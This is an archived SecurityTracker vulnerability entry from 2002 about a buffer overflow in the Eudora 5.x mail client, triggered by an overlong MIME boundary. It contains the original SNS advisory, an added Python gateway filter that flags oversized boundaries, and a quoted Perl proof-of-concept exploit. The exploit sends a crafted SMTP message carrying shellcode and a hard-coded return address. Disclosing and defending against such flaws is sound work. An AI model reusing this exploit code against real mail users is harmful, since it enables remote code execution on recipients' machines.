(Exploit Code is Available) Re: Qualcomm Eudora E-mail Client Software Buffer Overflow in Processing MIME Boundaries Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1004967
SecurityTracker URL: http://securitytracker.com/id/1004967
CVE Reference: GENERIC-MAP-NOMATCH
Date: Aug 6 2002
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 5.x

Description:
A buffer overflow vulnerability was reported in the Eudora e-mail client running on Microsoft Windows platforms. A remote user can execute arbitrary code on the system.
SecureNet Service reported that a remote user can trigger the buffer overflow by sending the target user an e-mail that uses a specially crafted (and long) string as the MIME message boundary. No further details were provided.
A user has provided some demonstration exploit code, available in the Source Message.

Impact:
A remote user can send e-mail to execute arbitrary code on the recipient's computer. The code will run with the privileges of the recipient.

Solution:
No solution was available at the time of this entry.
It is reported that the vendor plans to fix the flaw in the next release. No release date was provided.
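
Until a fixed client is installed, inbound mail can be screened at the gateway for boundary parameters that violate RFC 2046, which limits a boundary to 70 characters drawn from a restricted character set. The Python filter below is an added example, not part of the original alert or advisory; the function name and the sample messages are constructed for illustration.

```python
import re

MAX_BOUNDARY_LEN = 70  # RFC 2046 section 5.1.1: at most 70 characters
# RFC 2046 "bchars"; the last character may not be a space.
BCHARS = re.compile(rb"[0-9A-Za-z'()+_,\-./:=? ]*[0-9A-Za-z'()+_,\-./:=?]")
CT_HEADER = re.compile(rb"content-type\s*:(.*)", re.I)
# boundary parameter, quoted or bare; an unterminated quote falls through
# to the bare form so the whole run is still measured.
BOUNDARY = re.compile(rb';\s*boundary\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;\s]*))', re.I)


def boundary_findings(raw: bytes):
    """Return [(reason, length)] for every suspicious boundary parameter.

    Scans the whole message, not just the top header block, because nested
    multipart parts declare their own boundaries inside the body.
    """
    findings = []
    unfolded = re.sub(rb"\r?\n[ \t]+", b" ", raw)  # undo header folding
    for line in unfolded.splitlines():
        header = CT_HEADER.match(line)
        if not header:
            continue
        for param in BOUNDARY.finditer(header.group(1)):
            value = param.group(1) if param.group(1) is not None else param.group(2)
            if len(value) > MAX_BOUNDARY_LEN:
                findings.append(("too-long", len(value)))
            elif not BCHARS.fullmatch(value):
                findings.append(("malformed", len(value)))
    return findings


# Constructed sample messages (filler bytes only, no payload).
LEGIT = (b"MIME-Version: 1.0\r\nContent-Type: multipart/mixed;\r\n"
         b"\tboundary=\"----=_NextPart_000_0001\"\r\n\r\nbody\r\n")
OVERSIZED = (b"MIME-Version: 1.0\r\nContent-Type: multipart/mixed; boundary=\""
             + b"A" * 200 + b"\"\r\n\r\n")
NON_ASCII = b"Content-Type: multipart/mixed; boundary=\"\xff\xfeab\"\r\n\r\n"

if __name__ == "__main__":
    for name, msg in (("legit", LEGIT), ("oversized", OVERSIZED),
                      ("non-ascii", NON_ASCII)):
        print(name, boundary_findings(msg) or "ok")
```

A gateway would reject or quarantine any message for which the function returns a non-empty list; a body line that merely quotes such a header is also flagged, which is the conservative choice here.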

Vendor URL: www.eudora.com/

Cause: Boundary error

Underlying OS: Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:
This archive entry is a follow-up to the message listed below.

Source Message Contents

Date: Tue, 06 Aug 2002 15:49:24 +0900
Subject: Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability

This is a proof of concept exploit for Eudora 5.x buffer overflow.
Tested on:
Japanese Windows 2000 Professional SP2
Eudora Version 5.0.2-Jr2
#!/usr/local/bin/perl
#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#---------------------------------------------------------------------
use Socket;
$connect_host = 'mail.jumperz.net';
$port = 25;
$env_from = 'anvil@jumperz.net';
$env_to = 'target@jumperz.net';
$from = 'anvil@jumperz.net';
$to = 'target@jumperz.net';
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);
#egg written by UNYUN (http://www.shadowpenguin.org/)
#57bytes
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
$buf = "\x90" x 121;
$buf .= $egg;
$buf .= "\xEB\xA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll
$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
>From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;
--
Kanatoko <anvil@jumperz.net>
JUMPER : http://www.jumperz.net/(Japanese)
On Mon, 05 Aug 2002 15:24:25 +0900
snsadv@lac.co.jp wrote:
> ----------------------------------------------------------------------
> SNS Advisory No.55
> Eudora 5.x for Windows Buffer Overflow Vulnerability
>
> Problem first discovered: 6 Jun 2002
> Published: 5 Aug 2002
> ----------------------------------------------------------------------
>
> Overview:
> ---------
> Eudora 5.x for Windows contains a buffer overflow vulnerability,
> which could allow a remote attacker to execute arbitrary code.
>
> Problem Description:
> --------------------
> Eudora developed and distributed by QUALCOMM Inc.
> (http://www.qualcomm.com/), is a Mail User Agent running on Windows
> 95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
>
> The buffer overflow occurs when Eudora receives a message using a long
> string as a boundary, which is used to divide a multi-part message into
> separate parts. In our verification environment, we have found that
> this could allow arbitrary commands to be executed.
>
> Tested Version:
> ---------------
> Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
> Eudora 5.1.1 for Windows (Sponsored Mode) [English]
>
> Tested OS:
> ----------
> Microsoft Windows 2000 Professional SP2 [Japanese]
> Microsoft Windows 98 SE [Japanese]
>
> Solution:
> ---------
> The problem will be fixed in the next release of Eudora.
> The vendor has not reported when the next release will be available.
>
> Communication background:
> -------------------------
> 6 Jun 2002 : We discovered the vulnerability.
> 6 Jun 2002 : We reported the findings to Livin' on the EDGE Co., Ltd.
> (user support of Japanese version) .
> 14 Jun 2002 : the findings were reported again to Livin' on the EDGE Co.,
> Ltd. .
> 17 Jun 2002 : We contacted QUALCOMM Inc. .
> 18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
> investigation of the problem.
> 3 Jul 2002 : We asked QUALCOMM Inc. about the progress of the
> investigation
> 19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
> investigation
> 24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
> of this advisory
> 25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
> the next release
> 5 Aug 2002 : We decided to disclose this vulnerability due to concern
> over the potential consequences this issue may cause.
> Livin' on the EDGE Co., Ltd. has not provided any comments
> on this issue as of August 5, 2002.
>
> Discovered by:
> --------------
> Nobuo Miwa (LAC / n-miwa@lac.co.jp)
>
> Disclaimer:
> -----------
> All information in these advisories are subject to change without any
> advanced notices neither mutual consensus, and each of them is released
> as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences
> caused by applying those information.
>
> ------------------------------------------------------------------
> SecureNet Service(SNS) Security Advisory <snsadv@lac.co.jp>
> Computer Security Laboratory, LAC http://www.lac.co.jp/security/
>
>